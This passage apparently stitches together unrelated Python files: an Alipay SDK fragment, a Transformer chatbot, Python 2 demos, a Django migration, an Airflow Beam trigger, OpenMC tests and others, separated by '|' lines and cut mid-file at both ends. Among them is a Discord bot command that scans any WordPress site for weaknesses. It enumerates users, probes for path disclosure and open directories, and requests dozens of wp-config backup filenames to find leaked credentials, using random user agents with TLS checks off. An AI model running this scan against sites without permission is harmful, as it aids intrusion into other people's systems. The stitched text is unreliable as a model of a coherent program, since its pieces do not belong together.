                params['channel_id'] = json.dumps(obj=self.channel_id.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['channel_id'] = self.channel_id
        if self.channel_name:
            if hasattr(self.channel_name, 'to_alipay_dict'):
                params['channel_name'] = json.dumps(obj=self.channel_name.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['channel_name'] = self.channel_name
        if self.goto_url:
            if hasattr(self.goto_url, 'to_alipay_dict'):
                params['goto_url'] = json.dumps(obj=self.goto_url.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['goto_url'] = self.goto_url
        if self.subtitle:
            if hasattr(self.subtitle, 'to_alipay_dict'):
                params['subtitle'] = json.dumps(obj=self.subtitle.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['subtitle'] = self.subtitle
        if self.title:
            if hasattr(self.title, 'to_alipay_dict'):
                params['title'] = json.dumps(obj=self.title.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['title'] = self.title
        if self.terminal_type:
            params['terminal_type'] = self.terminal_type
        if self.terminal_info:
            params['terminal_info'] = self.terminal_info
        if self.prod_code:
            params['prod_code'] = self.prod_code
        if self.notify_url:
            params['notify_url'] = self.notify_url
        if self.return_url:
            params['return_url'] = self.return_url
        if self.udf_params:
            params.update(self.udf_params)
        return params

    def get_multipart_params(self):
        """Build the dict of file-upload parameters for the API call."""
        multipart_params = dict()
        if self.content_img:
            multipart_params['content_img'] = self.content_img
        if self.logo_img:
            multipart_params['logo_img'] = self.logo_img
        return multipart_params
|
import os
import pickle
import time
import numpy as np
import tensorflow as tf
import sentencepiece as spm
from model import *
class ChatEngine():
    """Loads a trained Transformer chatbot and generates replies."""

    def __init__(self):
        self.checkGPU()
        # Maximum number of tokens to generate per reply.
        self.maxlen = 32
        # index: id -> token mapping pickled at training time;
        # vocab is the inverse (token -> id).
        with open('./data/dict.pkl', 'rb') as f:
            self.index = pickle.load(f)
        self.vocab = {v: k for k, v in self.index.items()}
        vocab_size = len(self.vocab) + 1
        # Model hyperparameters — must match the checkpoint being restored.
        num_layers = 3
        d_model = 64
        dff = 256
        num_heads = 8
        dropout_rate = 0.1
        self.transformer = TransformerEX(num_layers, d_model, num_heads, dff,
                                         vocab_size, vocab_size,
                                         pe_input=vocab_size,
                                         pe_target=vocab_size,
                                         rate=dropout_rate
                                         )
        # The optimizer is only needed so the checkpoint keys resolve;
        # it is not used for inference.
        learning_rate = CustomSchedule(d_model)
        optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)
        checkpoint_path = "./models/training_checkpoints/"
        ckpt = tf.train.Checkpoint(transformer=self.transformer, optimizer=optimizer)
        ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)
        if ckpt_manager.latest_checkpoint:
            ckpt.restore(ckpt_manager.latest_checkpoint).expect_partial()
            print ('Latest checkpoint restored!!')
        # SentencePiece tokenizer trained alongside the model.
        mpath = 'models/sentensepice'
        self.sp = spm.SentencePieceProcessor()
        self.sp.load(mpath+'.model')

    def checkGPU(self):
        """Enable memory growth on every visible GPU (avoids grabbing all VRAM)."""
        physical_devices = tf.config.experimental.list_physical_devices('GPU')
        if len(physical_devices) > 0:
            for k in range(len(physical_devices)):
                tf.config.experimental.set_memory_growth(physical_devices[k], True)
                print('memory growth:', tf.config.experimental.get_memory_growth(physical_devices[k]))
        else:
            print("Not enough GPU hardware devices available")

    def response(self, sentences):
        """Generate a reply from a two-turn context.

        sentences: sequence of two strings (the two previous utterances).
        Returns the generated reply with the start/end markers stripped.
        """
        line1, line2 = sentences[0], sentences[1]
        # Tokenize with SentencePiece, then wrap in start/end markers and
        # map tokens to ids.
        parts1 = self.sp.encode_as_pieces(line1)
        parts2 = self.sp.encode_as_pieces(line2)
        parts1 = ['<start>'] + parts1 + ['<end>']
        parts2 = ['<start>'] + parts2 + ['<end>']
        num_parts1 = [self.vocab[part] for part in parts1]
        num_parts2 = [self.vocab[part] for part in parts2]
        inp1 = np.asarray(num_parts1)
        inp2 = np.asarray(num_parts2)
        # NOTE(review): in_sentence1/in_sentence2 are never used.
        in_sentence1, in_sentence2, ret_sentence = '', '', ''
        ret, _ = generate([inp1, inp2], self.vocab, self.maxlen, self.transformer)
        # Decode ids back into text, stopping at the end marker.
        for n in ret.numpy():
            if n == self.vocab['<end>']: break
            ret_sentence += self.index[n]
        ret_sentence = ret_sentence.replace('<start>', '').replace('<end>', '')
        return ret_sentence
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = 'jiaojianfeng'
import types
# Python 2 only: `print` statements and types.IntType do not exist in Python 3.
x = 20
print type(x) is types.IntType
print x.__class__
# In CPython 2, type(x), x.__class__, int and types.IntType are the same object.
print x.__class__ is type(x) is int is types.IntType
y = x
# id(object) returns the object's memory address in CPython; small ints are
# cached, so x and y share one object.
print hex(id(x)), hex(id(y))
print hex(id(int)), hex(id(types.IntType))
# Generated by Django 2.2.14 on 2020-12-01 00:38
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration creating the Alumno (student) model (auto-generated)."""

    initial = True

    dependencies = [
        # Materias must exist first: the M2M below targets Materias.Asignatura.
        ('Materias', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Alumno',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nombre', models.CharField(max_length=100)),
                ('edad', models.IntegerField()),
                ('grado', models.CharField(max_length=20)),
                ('grupo', models.CharField(max_length=10)),
                ('correo', models.CharField(max_length=200)),
                ('calificacion', models.IntegerField(null=True)),
                ('asistencia', models.IntegerField(null=True)),
                ('clases', models.ManyToManyField(related_name='clases', to='Materias.Asignatura')),
            ],
        ),
    ]
|
##### Message Types ####
# Integer opcodes identifying the kinds of messages exchanged between nodes.
# Naming appears to follow <sender>_<receiver>_<action>, presumably
# C = client, M = master, CS = chunk server — TODO confirm against the
# dispatch code that consumes these.
C_M_Create = 1
C_M_Read = 2
C_M_Write = 3
C_CS_Write = 4
C_CS_Read = 5
CS_M_Completed = 6
CS_M_Heartbeat = 7
|
def foo(var):
    """Demo: a bare `return` in `finally` swallows any in-flight exception."""
    try:
        print(var)
        # 1 + print(var)
    except:
        # Not reached here: print(var) above does not raise.
        1 + print('Why do you print me?') + 1
    else:
        # Runs on success: print() outputs the message and returns None,
        # then `1 + None` raises TypeError...
        1 + print('Why do you print me?') + 1
    finally:
        # ...but the bare return in finally discards that TypeError,
        # so foo() returns None instead of raising.
        return
# Prints "Hello", then "Why do you print me?", then None (foo's return value).
print(foo("Hello"))
"""
>> Why do you print me?
no raise of errors
"""
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 9 19:20:11 2015
@author: A30123
"""
######################################
#alternative code for retrieving variable values
def read_single_variable_as_float_csv(csvpathfilename, variablename):
    """Read one named column from a CSV file and return it as a float array.

    The first row is treated as the header; `variablename` selects the
    column by header name.  Returns an empty array for an empty file and
    raises ValueError if the column is missing or a value is not numeric.
    """
    import csv
    import numpy as np
    values = []
    # newline='' is the documented way to open files for the csv module;
    # the previous 'rU' mode was removed in Python 3.11 and raises ValueError.
    with open(csvpathfilename, newline='') as csvfile:
        rows = csv.reader(csvfile)
        header = next(rows, None)
        if header is None:
            return np.array(values)
        column = header.index(variablename)
        for row in rows:
            values.append(float(row[column]))
    return np.array(values)
######################################
########example##########################################################
StepLabelList=read_single_variable_as_float_csv("E://TMAlgroup//setpoint//run1032_6 inch Si.SL.AlN_SLs Buffer_Si_017-4_6 inch Si.SL.AlN_SLs Buffer_Si_017-4_1046-setpoint.csv","StepLabel")
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from typing import Any, AsyncIterator
from airflow.providers.apache.beam.hooks.beam import BeamAsyncHook
from airflow.triggers.base import BaseTrigger, TriggerEvent
class BeamPipelineTrigger(BaseTrigger):
    """
    Trigger to perform checking the pipeline status until it reaches terminate state.

    :param variables: Variables passed to the pipeline.
    :param py_file: Path to the python file to execute.
    :param py_options: Additional options.
    :param py_interpreter: Python version of the Apache Beam pipeline. If `None`, this defaults to the
        python3. To track python versions supported by beam and related issues
        check: https://issues.apache.org/jira/browse/BEAM-1251
    :param py_requirements: Additional python package(s) to install.
        If a value is passed to this parameter, a new virtual environment has been created with
        additional packages installed.
        You could also install the apache-beam package if it is not installed on your system, or you want
        to use a different version.
    :param py_system_site_packages: Whether to include system_site_packages in your virtualenv.
        See virtualenv documentation for more information.
        This option is only relevant if the ``py_requirements`` parameter is not None.
    :param runner: Runner on which pipeline will be run. By default, "DirectRunner" is being used.
        Other possible options: DataflowRunner, SparkRunner, FlinkRunner, PortableRunner.
        See: :class:`~providers.apache.beam.hooks.beam.BeamRunnerType`
        See: https://beam.apache.org/documentation/runners/capability-matrix/
    """

    def __init__(
        self,
        variables: dict,
        py_file: str,
        py_options: list[str] | None = None,
        py_interpreter: str = "python3",
        py_requirements: list[str] | None = None,
        py_system_site_packages: bool = False,
        runner: str = "DirectRunner",
    ):
        super().__init__()
        self.variables = variables
        self.py_file = py_file
        self.py_options = py_options
        self.py_interpreter = py_interpreter
        self.py_requirements = py_requirements
        self.py_system_site_packages = py_system_site_packages
        self.runner = runner

    def serialize(self) -> tuple[str, dict[str, Any]]:
        """Serialize BeamPipelineTrigger arguments and classpath."""
        # The kwargs here must mirror __init__ exactly so the triggerer
        # process can reconstruct an equivalent trigger instance.
        return (
            "airflow.providers.apache.beam.triggers.beam.BeamPipelineTrigger",
            {
                "variables": self.variables,
                "py_file": self.py_file,
                "py_options": self.py_options,
                "py_interpreter": self.py_interpreter,
                "py_requirements": self.py_requirements,
                "py_system_site_packages": self.py_system_site_packages,
                "runner": self.runner,
            },
        )

    async def run(self) -> AsyncIterator[TriggerEvent]:  # type: ignore[override]
        """Get current pipeline status and yields a TriggerEvent."""
        hook = self._get_async_hook()
        try:
            # The hook runs the pipeline and resolves to its exit code.
            return_code = await hook.start_python_pipeline_async(
                variables=self.variables,
                py_file=self.py_file,
                py_options=self.py_options,
                py_interpreter=self.py_interpreter,
                py_requirements=self.py_requirements,
                py_system_site_packages=self.py_system_site_packages,
            )
        except Exception as e:
            self.log.exception("Exception occurred while checking for pipeline state")
            yield TriggerEvent({"status": "error", "message": str(e)})
        else:
            # Exit code 0 means the pipeline terminated successfully.
            if return_code == 0:
                yield TriggerEvent(
                    {
                        "status": "success",
                        "message": "Pipeline has finished SUCCESSFULLY",
                    }
                )
            else:
                yield TriggerEvent({"status": "error", "message": "Operation failed"})
            # Explicitly end the async generator after the single event.
            return

    def _get_async_hook(self) -> BeamAsyncHook:
        """Build the async Beam hook for the configured runner."""
        return BeamAsyncHook(runner=self.runner)
|
import json
import re
import discord
import os
import requests
from lxml import etree
from random import randint
from secret import utils
async def on_message(message, secret_context):
    """Entry point for the `!wpscan` chat command.

    `!wpscan update` refreshes the local vulnerability DB; `!wpscan <url>`
    runs the full scan suite against a WordPress site and reports each
    finding to the channel as an embed.
    """
    parts = message.content.split(" ")
    if len(parts) < 2:
        # print the help
        secret_context.bus.emit('secret_command', command='!help wpscan')
    else:
        if parts[1] == 'update':
            await update_vuln_db(message, secret_context)
        else:
            # Bootstrap the vuln DB on first use.
            if not os.path.exists('secret/api/wordpress'):
                await update_vuln_db(message, secret_context)
            user_agent = get_random_agent()
            target = parts[1]
            # Normalize the target URL to end with a slash.
            if target[-1] != '/':
                target = target + '/'
            # verify=False: TLS certificate checking is deliberately disabled
            # for scanning — NOTE(review): confirm this is intended.
            index = requests.get(target, headers={"User-Agent": user_agent}, verify=False)
            # Heuristic: WordPress pages reference wp-* asset paths.
            if "wp-" not in index.text:
                embed = utils.simple_embed('**%s**' % target, 'does not appear to be powered by wordpress',
                                           discord.Color.red())
                await secret_context.discord_client.send_message(message.channel, embed=embed)
            else:
                version = await check_version(target, user_agent, index)
                embed = utils.simple_embed('**%s**' % target, 'wordpress version found: **%s**' % version,
                                           discord.Color.green())
                await secret_context.discord_client.send_message(message.channel, embed=embed)
                # Run every check; each reports its own findings.
                await check_backup_files(message, secret_context, target, user_agent)
                await check_xml_rpc(message, secret_context, target, user_agent)
                await check_directory_listing(message, secret_context, target, user_agent)
                await check_robots(message, secret_context, target, user_agent)
                await full_path_disclose(message, secret_context, target, user_agent)
                await enumerate_users(message, secret_context, target, user_agent)
                if version is not None:
                    await list_wp_version_vuln(message, secret_context, target, version)
                await enumerate_plugins(message, secret_context, index)
                await enumerate_themes(message, secret_context, index)
async def enumerate_themes(message, secret_context, index):
    """Detect themes (and versions) referenced by the front page and report known vulns.

    `index` is the requests response for the site's front page.
    """
    # Bug fix: the original pattern used `[css|js]`, a character class
    # matching any single one of 'c','s','|','j' — replaced with a real
    # alternation on the asset extension.
    regex = re.compile(r'wp-content/themes/(.*?)/.*?\.(?:css|js).*?ver=([0-9.]*)')
    matches = regex.findall(index.text)
    if not matches:
        return
    # Load the theme vulnerability DB once instead of once per match.
    with open('secret/api/wordpress/themes.json') as data_file:
        data = json.load(data_file)
    seen = set()
    for raw_name, theme_version in matches:
        # Strip common suffixes that are not part of the DB's theme slug.
        theme_name = raw_name.replace('-master', '').replace('.min', '')
        if raw_name in seen:
            continue  # report each theme only once
        seen.add(raw_name)
        embed = utils.simple_embed(theme_name, theme_version,
                                   utils.random_color())
        if theme_name in data.keys():
            if is_lower(theme_version, data[theme_name]['latest_version'], False):
                embed.add_field(name='latest version', value=data[theme_name]['latest_version'], inline=False)
            for vuln in data[theme_name]['vulnerabilities']:
                # A vuln applies when its fix version is unknown or newer
                # than the installed version.
                if 'fixed_in' in vuln.keys() and (vuln['fixed_in'] is None or
                                                  is_lower(theme_version, vuln['fixed_in'], True)):
                    embed.add_field(name=vuln['vuln_type'] + ' | ' + vuln['title'] + ' (' + vuln['id'] + ')',
                                    value="fixed in %s" % vuln['fixed_in'], inline=False)
                    for ref_key in vuln['references'].keys():
                        for ref in vuln['references'][ref_key]:
                            if ref_key != 'url':
                                embed.add_field(name='reference', value=ref_key.capitalize() + ' - ' + ref)
                            else:
                                embed.add_field(name='reference', value=ref)
        await secret_context.discord_client.send_message(message.channel, embed=embed)
async def enumerate_plugins(message, secret_context, index):
    """Detect plugins (and versions) referenced by the front page and report known vulns.

    `index` is the requests response for the site's front page.
    """
    # Bug fix: `[css|js]` was a character class, not an alternation —
    # replaced with a real alternation on the asset extension.
    regex = re.compile(r'wp-content/plugins/(.*?)/.*?\.(?:css|js).*?ver=([0-9.]*)')
    matches = regex.findall(index.text)
    if not matches:
        return
    # Load the plugin vulnerability DB once instead of once per match.
    with open('secret/api/wordpress/plugins.json') as data_file:
        data = json.load(data_file)
    seen = set()
    for raw_name, plugin_version in matches:
        # Strip common suffixes that are not part of the DB's plugin slug.
        plugin_name = raw_name.replace('-master', '').replace('.min', '')
        # ver=1 is a common cache-buster rather than a real version; skip
        # duplicates so each plugin is reported once.
        if plugin_name in seen or plugin_version == '1':
            continue
        seen.add(plugin_name)
        embed = utils.simple_embed(plugin_name, plugin_version,
                                   utils.random_color())
        if plugin_name in data.keys():
            if is_lower(plugin_version, data[plugin_name]['latest_version'], False):
                embed.add_field(name='latest version', value=data[plugin_name]['latest_version'], inline=False)
            for vuln in data[plugin_name]['vulnerabilities']:
                # A vuln applies when its fix version is unknown or newer
                # than the installed version.
                if 'fixed_in' in vuln.keys() and (vuln['fixed_in'] is None or
                                                  is_lower(plugin_version, vuln['fixed_in'], True)):
                    embed.add_field(name=vuln['vuln_type'] + ' | ' + vuln['title'] + ' (' + vuln['id'] + ')',
                                    value="fixed in %s" % vuln['fixed_in'], inline=False)
                    for ref_key in vuln['references'].keys():
                        for ref in vuln['references'][ref_key]:
                            if ref_key != 'url':
                                embed.add_field(name='reference', value=ref_key.capitalize() + ' - ' + ref)
                            else:
                                embed.add_field(name='reference', value=ref)
        await secret_context.discord_client.send_message(message.channel, embed=embed)
async def list_wp_version_vuln(message, secret_context, target, version):
    """Report known WordPress core vulnerabilities for `version`.

    Fix: the original fell through after sending the "version not in db"
    message and then raised KeyError on data[version]; return early instead.
    """
    # Load json file
    with open('secret/api/wordpress/wordpresses.json') as data_file:
        data = json.load(data_file)
    if version not in data:
        embed = utils.simple_embed('**%s**' % target,
                                   'wordpress version not in db. update wordpress vuln db and try again',
                                   discord.Color.red())
        await secret_context.discord_client.send_message(message.channel, embed=embed)
        return
    if not data[version]["vulnerabilities"]:
        # No entries for the exact version: fall back to a later version
        # sharing the same 4-character prefix.
        versions = data.keys()
        for v in versions:
            if v[:4] in version and is_lower(version, v, False):
                version = v
    embed = utils.simple_embed('**%s**' % target,
                               'wordpress core vulnerabilities',
                               discord.Color.green())
    for vuln in data[version]["vulnerabilities"]:
        embed.add_field(name=vuln['vuln_type'], value=vuln['title'] + ' - ' + vuln['id'], inline=False)
        for ref_key in vuln['references'].keys():
            for ref in vuln['references'][ref_key]:
                if ref_key != 'url':
                    embed.add_field(name='reference', value=ref_key.capitalize() + ' - ' + ref)
                else:
                    embed.add_field(name='reference', value=ref)
    await secret_context.discord_client.send_message(message.channel, embed=embed)
async def enumerate_users(message, secret_context, target, user_agent):
    """List users exposed by the wp-json REST API and report name/slug/id."""
    response = requests.get(target + "wp-json/wp/v2/users",
                            headers={"User-Agent": user_agent}, verify=False)
    if "200" not in str(response):
        return
    embed = utils.simple_embed('**%s**' % target, 'enumerated users', discord.Color.green())
    for user in json.loads(response.text):
        embed.add_field(name=user['name'] + " - " + user['slug'], value=user['id'])
    await secret_context.discord_client.send_message(message.channel, embed=embed)
async def full_path_disclose(message, secret_context, target, user_agent):
    """Probe rss-functions.php for a PHP fatal error that leaks the install path."""
    probe = target + "wp-includes/rss-functions.php"
    body = requests.get(probe, headers={"User-Agent": user_agent}, verify=False).text
    matches = re.compile("Fatal error:.*? in (.*?) on", re.S).findall(body)
    if matches:
        embed = utils.simple_embed('**%s**' % target, 'full path disclose in **%s** exposing: %s'
                                   % (probe, matches[0].replace('\n', '')),
                                   discord.Color.green())
        await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_robots(message, secret_context, target, user_agent):
    """Fetch robots.txt and report every Disallow rule it contains."""
    r = requests.get(target + "robots.txt", headers={"User-Agent": user_agent}, verify=False)
    if "200" not in str(r) or "404" in r.text:
        return
    embed = utils.simple_embed('**%s**' % target, 'robots is available at: **%s**' % target + "robots.txt",
                               discord.Color.green())
    for line in r.text.split('\n'):
        if "Disallow:" in line:
            embed.add_field(name='disallow', value=line, inline=False)
    await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_directory_listing(message, secret_context, target, user_agent):
    """Check the common WordPress directories for open directory listings."""
    checks = (("wp-content/uploads/", "Uploads"),
              ("wp-content/plugins/", "Plugins"),
              ("wp-content/themes/", "Themes"),
              ("wp-includes/", "Includes"),
              ("wp-admin/", "Admin"))
    for directory, name in checks:
        response = requests.get(target + directory, headers={"User-Agent": user_agent}, verify=False)
        if "Index of" in response.text:
            embed = utils.simple_embed('**%s**' % target,
                                       'directory listing is enabled for: **%s**' % target + directory,
                                       discord.Color.green())
            await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_xml_rpc(message, secret_context, target, user_agent):
    """Report an exposed xmlrpc.php endpoint on the target site."""
    r = requests.get(target + "xmlrpc.php", headers={"User-Agent": user_agent}, verify=False)
    # NOTE(review): this requires "404" to APPEAR in the body, while the other
    # checks in this file require its absence (`not "404" in r.text`). This
    # looks like an inverted condition -- confirm intended behavior.
    if "200" in str(r) and "404" in r.text:
        embed = utils.simple_embed('**%s**' % target, 'found xml-rpc interface: **%s**' % target + "xmlrpc.php",
                                   discord.Color.green())
        await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_backup_files(message, secret_context, target, user_agent):
    """Probe for common leftover wp-config backup files and report hits."""
    backup = ['wp-config.php~', 'wp-config.php.save', '.wp-config.php.bck', 'wp-config.php.bck', '.wp-config.php.swp',
              'wp-config.php.swp', 'wp-config.php.swo', 'wp-config.php_bak', 'wp-config.bak', 'wp-config.php.bak',
              'wp-config.save', 'wp-config.old', 'wp-config.php.old', 'wp-config.php.orig', 'wp-config.orig',
              'wp-config.php.original', 'wp-config.original', 'wp-config.txt', 'wp-config.php.txt', 'wp-config.backup',
              'wp-config.php.backup', 'wp-config.copy', 'wp-config.php.copy', 'wp-config.tmp', 'wp-config.php.tmp',
              'wp-config.zip', 'wp-config.php.zip', 'wp-config.db', 'wp-config.php.db', 'wp-config.dat',
              'wp-config.php.dat', 'wp-config.tar.gz', 'wp-config.php.tar.gz', 'wp-config.back', 'wp-config.php.back',
              'wp-config.test', 'wp-config.php.test']
    for candidate in backup:
        response = requests.get(target + candidate, headers={"User-Agent": user_agent}, verify=False)
        if "200" in str(response) and "404" not in response.text:
            embed = utils.simple_embed('**%s**' % target, 'found config backup: **%s**' % target + candidate,
                                       discord.Color.green())
            await secret_context.discord_client.send_message(message.channel, embed=embed)
async def check_version(target, user_agent, index):
    """Determine the WordPress version, trying meta tag, feed, file hashes,
    then readme.html, in that order; returns None when all fail."""
    version = fingerprint_wp_version_meta_based(index)
    if version is None:
        version = fingerprint_wp_version_feed_based(target, user_agent)
    if version is None:
        version = fingerprint_wp_version_hash_based(target)
    if version is None:
        response = requests.get(target + 'readme.html', headers={"User-Agent": user_agent}, verify=False)
        if "200" in str(response):
            found = re.compile('Version (.*)').findall(response.text)
            if found and found[0] is not None and found[0] != "":
                return found[0]
    return version
def fingerprint_wp_version_meta_based(index):
    """Extract the WordPress version from the generator <meta> tag, or None."""
    found = re.findall('meta name="generator" content="WordPress (.*?)"',
                       index.text)
    return found[0] if found else None
def fingerprint_wp_version_feed_based(target, user_agent):
    """Extract the WordPress version from the RSS feed generator tag, or None."""
    body = requests.get(target + "index.php/feed",
                        headers={"User-Agent": user_agent}, verify=False).text
    found = re.findall(r'generator>https://wordpress.org/\?v=(.*?)<\/generator', body)
    return found[0] if found else None
def fingerprint_wp_version_hash_based(target):
    """Identify the WordPress version by hashing well-known static files.

    Downloads each candidate file listed in wp_versions.xml, compares its MD5
    against the known hashes, and returns the matching version text (or None).
    """
    tree = etree.parse("secret/api/wordpress/wp_versions.xml")
    root = tree.getroot()
    for file_node in root:
        src = file_node.get('src')
        download_url = (target + src).replace('$', '')
        local_path = "/tmp/" + src.replace('/', '-')
        utils.download_file(download_url, local_path)
        file_hash = utils.md5_hash(local_path)
        try:
            os.remove(local_path)
        except Exception:
            pass  # best-effort cleanup of the temporary download
        for hash_node in file_node:
            if "Element" in str(hash_node) and file_hash == hash_node.get('md5'):
                return hash_node[0].text
    return None
def get_random_agent():
    """Return a random User-Agent string from the local wpscan user-agents list.

    Fix: the original used randint(0, len(uas)); randint's upper bound is
    inclusive, so it could index one past the end and raise IndexError.
    """
    with open('secret/api/wordpress/user-agents.txt', 'r') as f:
        uas = f.read()
    uas = re.sub("#.*", "", uas)   # strip comment lines
    uas = uas.replace("\n\n", "")  # collapse blank separators
    uas = uas.split('\n')
    return uas[randint(0, len(uas) - 1)]
async def update_vuln_db(message, secret_context):
    """Download the wpscan vulnerability database files into secret/api/wordpress,
    announcing progress in the Discord channel."""
    if not os.path.exists('secret/api/wordpress'):
        os.mkdir('secret/api/wordpress')
    update_url = "https://data.wpscan.org/"
    update_files = ['local_vulnerable_files.xml', 'local_vulnerable_files.xsd',
                    'timthumbs.txt', 'user-agents.txt', 'wp_versions.xml', 'wp_versions.xsd',
                    'wordpresses.json', 'plugins.json', 'themes.json']
    embed = utils.simple_embed('wordpress', 'updating vulnerability database',
                               discord.Color.green())
    await secret_context.discord_client.send_message(message.channel, embed=embed)
    for filename in update_files:
        embed = utils.simple_embed('wordpress', 'downloading %s' % filename,
                                   utils.random_color())
        await secret_context.discord_client.send_message(message.channel, embed=embed)
        utils.download_raw_file(update_url + filename, "secret/api/wordpress/" + filename)
    # These two are served gzip-compressed and must be expanded in place.
    unzip_file("secret/api/wordpress/user-agents.txt")
    unzip_file("secret/api/wordpress/timthumbs.txt")
def unzip_file(filename):
    """Decompress a gzip file in place: `filename` holds gzipped bytes on
    entry and the decompressed bytes on return.

    Fix: the original shelled out via os.system('mv ...' / 'gzip -d ...'),
    which breaks on paths containing spaces or shell metacharacters and is a
    shell-injection risk; use the gzip/shutil standard library instead.
    """
    import gzip
    import shutil
    gz_path = filename + ".gz"
    os.rename(filename, gz_path)
    with gzip.open(gz_path, 'rb') as src, open(filename, 'wb') as dst:
        shutil.copyfileobj(src, dst)
    os.remove(gz_path)  # gzip -d removed the .gz; match that behavior
def is_lower(str_one, str_two, equal):
    """Compare two dotted version strings.

    Returns True when str_one sorts below str_two (or ties, when `equal` is
    True). A None on either side counts as lower unless both are None.
    Components are weighted by (position + 1) ** 10 over the reversed string;
    any non-numeric component (or length mismatch) yields True.
    """
    if str_one is None or str_two is None:
        # Exactly one side None -> True; both None -> False.
        return not (str_one is None and str_two is None)
    if len(str_one) < 5:
        str_one += '.0'
    if len(str_two) < 5:
        str_two += '.0'
    parts_one = str_one[::-1].split('.')
    parts_two = str_two[::-1].split('.')
    score_one = 0
    score_two = 0
    for position, component in enumerate(parts_one):
        weight = (position + 1) ** 10
        try:
            score_one += weight * int(component)
            score_two += weight * int(parts_two[position])
        except Exception:
            return True
    if score_one < score_two:
        return True
    if equal and score_one == score_two:
        return True
    return False
|
import numpy as np
import openmc
import pytest
@pytest.fixture(scope='module')
def pincell1(uo2, water):
    """Fuel-pin universe with a 0.35 cm fuel radius."""
    boundary = openmc.ZCylinder(r=0.35)
    fuel_cell = openmc.Cell(fill=uo2, region=-boundary)
    mod_cell = openmc.Cell(fill=water, region=+boundary)
    pin = openmc.Universe(cells=[fuel_cell, mod_cell])
    pin.fuel = fuel_cell
    pin.moderator = mod_cell
    return pin
@pytest.fixture(scope='module')
def pincell2(uo2, water):
    """Fuel-pin universe with a 0.4 cm fuel radius."""
    boundary = openmc.ZCylinder(r=0.4)
    fuel_cell = openmc.Cell(fill=uo2, region=-boundary)
    mod_cell = openmc.Cell(fill=water, region=+boundary)
    pin = openmc.Universe(cells=[fuel_cell, mod_cell])
    pin.fuel = fuel_cell
    pin.moderator = mod_cell
    return pin
@pytest.fixture(scope='module')
def zr():
    """Natural-zirconium material (density is arbitrary for these tests)."""
    material = openmc.Material()
    material.add_element('Zr', 1.0)
    material.set_density('g/cm3', 1.0)
    return material
@pytest.fixture(scope='module')
def rlat2(pincell1, pincell2, uo2, water, zr):
    """2D rectangular lattice for testing."""
    pitch = 1.2
    n = 3
    outer_cell = openmc.Cell(fill=zr)
    u1, u2 = pincell1, pincell2
    lat = openmc.RectLattice()
    lat.lower_left = (-pitch * n / 2, -pitch * n / 2)
    lat.pitch = (pitch, pitch)
    lat.outer = openmc.Universe(cells=[outer_cell])
    lat.universes = [
        [u1, u2, u1],
        [u2, u1, u2],
        [u2, u1, u1],
    ]
    return lat
@pytest.fixture(scope='module')
def rlat3(pincell1, pincell2, uo2, water, zr):
    """3D rectangular lattice for testing."""
    # Extra hydrogen-filled universe used in the top layer.
    hydrogen = openmc.Material()
    hydrogen.add_element('H', 1.0)
    hydrogen.set_density('g/cm3', 0.09)
    h_cell = openmc.Cell(fill=hydrogen)
    u3 = openmc.Universe(cells=[h_cell])

    pitch = 1.2
    n = 3
    outer_cell = openmc.Cell(fill=zr)
    u1, u2 = pincell1, pincell2
    lat = openmc.RectLattice()
    lat.lower_left = (-pitch * n / 2, -pitch * n / 2, -10.0)
    lat.pitch = (pitch, pitch, 10.0)
    lat.outer = openmc.Universe(cells=[outer_cell])
    lat.universes = [
        [[u1, u2, u1],
         [u2, u1, u2],
         [u2, u1, u1]],
        [[u3, u1, u2],
         [u1, u3, u2],
         [u2, u1, u1]],
    ]
    return lat
def test_mesh2d(rlat2):
    """RegularMesh.from_rect_lattice should mirror the 2D lattice extent."""
    extent = np.array(rlat2.shape) * rlat2.pitch
    coarse = openmc.RegularMesh.from_rect_lattice(rlat2)
    fine = openmc.RegularMesh.from_rect_lattice(rlat2, division=3)
    for mesh, dims in ((coarse, (3, 3)), (fine, (9, 9))):
        assert np.array_equal(mesh.dimension, dims)
        assert np.array_equal(mesh.lower_left, rlat2.lower_left)
        assert np.array_equal(mesh.upper_right, rlat2.lower_left + extent)
def test_mesh3d(rlat3):
    """RegularMesh.from_rect_lattice should mirror the 3D lattice extent."""
    extent = np.array(rlat3.shape) * rlat3.pitch
    coarse = openmc.RegularMesh.from_rect_lattice(rlat3)
    fine = openmc.RegularMesh.from_rect_lattice(rlat3, division=3)
    for mesh, dims in ((coarse, (3, 3, 2)), (fine, (9, 9, 6))):
        assert np.array_equal(mesh.dimension, dims)
        assert np.array_equal(mesh.lower_left, rlat3.lower_left)
        assert np.array_equal(mesh.upper_right, rlat3.lower_left + extent)
|
from unittest import mock
import pytest
from myst_parser.docutils_renderer import SphinxRenderer
@pytest.fixture
def renderer():
    """Plain SphinxRenderer, entered as a context manager for the test."""
    instance = SphinxRenderer()
    with instance:
        yield instance
@pytest.fixture
def sphinx_renderer():
    """SphinxRenderer with a full Sphinx environment loaded."""
    renderer = SphinxRenderer(load_sphinx_env=True)
    with renderer:
